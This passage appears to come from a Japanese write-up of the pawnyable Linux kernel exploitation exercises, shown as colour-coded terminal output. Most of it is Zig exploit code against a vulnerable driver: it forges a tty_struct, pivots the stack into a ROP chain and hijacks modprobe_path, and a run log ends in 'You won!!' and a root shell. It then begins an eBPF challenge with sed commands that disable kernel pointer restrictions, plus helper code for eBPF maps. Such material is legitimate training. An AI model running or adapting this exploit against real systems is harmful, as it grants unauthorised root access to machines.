�[1m�[37m �[0m�[33mbreak�[0m�[1m�[37m �[0m�[1m�[36m:�[0m�[1m�[37mblk�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mbytesAsValue�[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37maar_page�[0m�[1m�[37m[�[0m�[1m�[37moffset�[0m�[1m�[37m..][�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m8�[0m�[1m�[37m]).�[0m�[1m�[36m*�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[37m �[0m�[1m�[37moffset�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"Heap leak = 0x{x}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37mheap_leak�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37m@memcpy�[0m�[1m�[37m(�[0m�[1m�[37mblob_buf�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m1024�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[1m�[37maar_page�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m1024�[0m�[1m�[37m]);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37maaw_page�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mfusePage�[0m�[1m�[37m(�[0m�[33m"/tmp/pwn/aaw"�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mmunmap�[0m�[1m�[37m(�[0m�[1m�[37maaw_page�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mtty�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mbytesAsValue�[0m�[1m�[37m(�[0m�[1m�[37mtty_struct�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mblob_buf�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mtty�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m.�[0m�[1m�[37mmagic�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0x5401�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mtty�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m.�[0m�[1m�[37mkref�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mtty�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m.�[0m�[1m�[37mdev�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mtty�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m.�[0m�[1m�[37mdriver�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mheap_leak�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mtty�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m.�[0m�[1m�[37mops�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mheap_leak�[0m�[1m�[36m+�[0m�[1m�[36m0x100�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// ensure ropchain is far away enough from important tty_struct internals�[0m
�[1m�[37m �[0m�[37m@memcpy�[0m�[1m�[37m(�[0m�[1m�[37mblob_buf�[0m�[1m�[37m[�[0m�[1m�[36m0x100�[0m�[1m�[37m..][�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[1m�[37mtty_operations�[0m�[1m�[37m)],�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mtty_operations�[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mioctl�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mPUSH_RDX_CMP_EAX_0x415b005c_POP_RSP_POP_RBP�[0m�[1m�[37m �[0m�[1m�[37m}));�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mropchain�[0m�[1m�[37m(�[0m�[1m�[37mblob_buf�[0m�[1m�[37m[�[0m�[1m�[36m0x100�[0m�[1m�[37m..][�[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[1m�[37mtty_operations�[0m�[1m�[37m)..]);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mvictim_id�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mfleckvieh�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mfleck_fd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mADD�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mblob_buf�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mfleckvieh�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mfleck_fd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSET�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37maaw_page�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m1024�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[1m�[37mvictim_id�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mttys�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mtty�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mtty�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0xdeadbeef�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mheap_leak�[0m�[1m�[36m+�[0m�[1m�[36m0x100�[0m�[1m�[36m+�[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[1m�[37mtty_operations�[0m�[1m�[37m));�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mpub�[0m�[1m�[37m �[0m�[33mfn�[0m�[1m�[37m �[0m�[37mmain�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mcpu�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mcpu_set_t�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@splat�[0m�[1m�[37m(�[0m�[1m�[36m0�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mcpu�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m]�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m1�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37msched_setaffinity�[0m�[1m�[37m(�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37mgetpid�[0m�[1m�[37m(),�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mcpu�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37mcatchSigsegv�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mmodprobePath�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37msaveState�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mfuse_ready�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mThread�[0m�[1m�[37m.�[0m�[1m�[37mResetEvent�[0m�[1m�[37m{};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mt�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mThread�[0m�[1m�[37m.�[0m�[37mspawn�[0m�[1m�[37m(.{},�[0m�[1m�[37m �[0m�[1m�[37mfuseThread�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[36m&�[0m�[1m�[37mfuse_ready�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mpinThreadToCore�[0m�[1m�[37m(�[0m�[1m�[37mt�[0m�[1m�[37m.�[0m�[37mgetHandle�[0m�[1m�[37m(),�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mt�[0m�[1m�[37m.�[0m�[37mdetach�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mfuse_ready�[0m�[1m�[37m.�[0m�[37mwait�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mfleck_fd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mopen�[0m�[1m�[37m(�[0m�[33m"/dev/fleckvieh"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mACCMODE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mRDWR�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m �[0m�[1m�[36m0o660�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mclose�[0m�[1m�[37m(�[0m�[1m�[37mfleck_fd�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mexploit�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37mdebug�[0m�[1m�[37m(�[0m�[33m"Wat"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mDEBUG�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mtrue�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37muser�[0m
�[1m�[37m[DBUG] Beginning AAR�[0m
�[1m�[37m[INFO] Kernel base @ 0xffffffff81200000�[0m
�[1m�[37m[DBUG] Beginning AAR�[0m
�[1m�[37m[INFO] Heap leak = 0xffffa244c3c08c00�[0m
�[1m�[37m[DBUG] Beginning AAW�[0m
�[1m�[37m[INFO] You won!!�[0m
�[1m�[37mroot�[0m
(DIR) 完全なエクスプロイト
楽勝。
== �[1m�[4mBrahman�[22m�[24m
課題情報
�[1m�[37msed -i -E �[0m�[33m"s|^(echo 2 > /proc/sys/kernel/kptr_restrict)|# \1|"�[0m�[1m�[37m rootfs/etc/init.d/S99pawnyable�[0m
�[1m�[37msed -i -E �[0m�[33m"s|^(echo 1 > /proc/sys/kernel/dmesg_restrict)|# \1|"�[0m�[1m�[37m rootfs/etc/init.d/S99pawnyable�[0m
�[1m�[37msed -i -E �[0m�[33m"s/(setuidgid) 1337 (sh)/\1 0 \2/"�[0m�[1m�[37m rootfs/etc/init.d/S99pawnyable�[0m
�[1m�[37m�[0m
�[1m�[37msed -i �[0m�[33m'/${DEBUG:+ -s} \\/d'�[0m�[1m�[37m run.sh�[0m
�[1m�[37msed -i -E �[0m�[33m'/qemu-system-x86_64 \\/a \ \ \ \ ${DEBUG:+ -s} \\'�[0m�[1m�[37m run.sh�[0m
�[1m�[37msed -i -E �[0m�[33m's/ kaslr/ ${NOKASLR:+no}kaslr/'�[0m�[1m�[37m run.sh�[0m
�[1m�[37msed -i �[0m�[33m'/-serial unix:vm.sock,server,nowait/d'�[0m�[1m�[37m run.sh�[0m
�[1m�[37msed -i -E �[0m�[33m'/-monitor \/dev\/null/a \ \ \ \ -serial unix:vm.sock,server,nowait \\'�[0m�[1m�[37m run.sh�[0m
�[1m�[37mSMEP enabled�[0m
�[1m�[37mSMAP enabled�[0m
�[1m�[37mKPTI enabled�[0m
�[1m�[37mKASLR enabled�[0m
これは僕のeBPFの初経験から、最初にちょっと勉強した [7]。
�[1m�[36m<<�[0m�[1m�[37mpawnyable�[0m�[1m�[36m-�[0m�[1m�[37mlib�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mBPF�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mAF�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mAF�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mSOCK�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mSOCK�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mSOL�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mSOL�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mSO�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mSO�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mSK�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33menum�[0m�[1m�[37m(�[0m�[1m�[36mi32�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mDROP�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mPASS�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33m// broken in 0.14.1�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37m_ld_dw1�[0m�[1m�[37m(�[0m�[1m�[37mdst�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mInsn�[0m�[1m�[37m.�[0m�[1m�[37mReg�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mimm�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mInsn�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mcode�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mLD�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mDW�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mIMM�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mdst�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@intFromEnum�[0m�[1m�[37m(�[0m�[1m�[37mdst�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37msrc�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@intFromEnum�[0m�[1m�[37m(�[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mInsn�[0m�[1m�[37m.�[0m�[1m�[37mReg�[0m�[1m�[37m.�[0m�[1m�[37mr0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37moff�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mimm�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@as�[0m�[1m�[37m(�[0m�[1m�[36mi32�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@bitCast�[0m�[1m�[37m(�[0m�[37m@as�[0m�[1m�[37m(�[0m�[1m�[36mu32�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@truncate�[0m�[1m�[37m(�[0m�[1m�[37mimm�[0m�[1m�[37m)))),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37m_ld_dw2�[0m�[1m�[37m(�[0m�[1m�[37mimm�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mInsn�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mcode�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mdst�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37msrc�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37moff�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mimm�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@as�[0m�[1m�[37m(�[0m�[1m�[36mi32�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@bitCast�[0m�[1m�[37m(�[0m�[37m@as�[0m�[1m�[37m(�[0m�[1m�[36mu32�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@truncate�[0m�[1m�[37m(�[0m�[1m�[37mimm�[0m�[1m�[37m �[0m�[1m�[36m>>�[0m�[1m�[37m �[0m�[1m�[36m32�[0m�[1m�[37m)))),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mbpf_string_map�[0m�[1m�[37m(�[0m�[1m�[37mstr�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m:�[0m�[1m�[36m0�[0m�[1m�[37m]�[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[36mu8�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mattr�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mAttr�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mmap_create�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mzeroes�[0m�[1m�[37m(�[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mMapCreateAttr�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mattr�[0m�[1m�[37m.�[0m�[1m�[37mmap_create�[0m�[1m�[37m.�[0m�[1m�[37mmap_type�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@intFromEnum�[0m�[1m�[37m(�[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mMapType�[0m�[1m�[37m.�[0m�[1m�[37marray�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mattr�[0m�[1m�[37m.�[0m�[1m�[37mmap_create�[0m�[1m�[37m.�[0m�[1m�[37mkey_size�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[1m�[36mi32�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mattr�[0m�[1m�[37m.�[0m�[1m�[37mmap_create�[0m�[1m�[37m.�[0m�[1m�[37mvalue_size�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mattr�[0m�[1m�[37m.�[0m�[1m�[37mmap_create�[0m�[1m�[37m.�[0m�[1m�[37mmax_entries�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m1�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mattr�[0m�[1m�[37m.�[0m�[1m�[37mmap_create�[0m�[1m�[37m.�[0m�[1m�[37mmap_flags�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mBPF_F_RDONLY_PROG�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mrc�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37mbpf�[0m�[1m�[37m(.�[0m�[1m�[37mmap_create�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mattr�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mMapCreateAttr�[0m�[1m�[37m));�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37merrno�[0m�[1m�[37m(�[0m�[1m�[37mrc�[0m�[1m�[37m))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSUCCESS�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[37m@intCast�[0m�[1m�[37m(�[0m�[1m�[37mrc�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mINVAL�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mMapTypeOrAttrInvalid�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mNOMEM�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mSystemResources�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
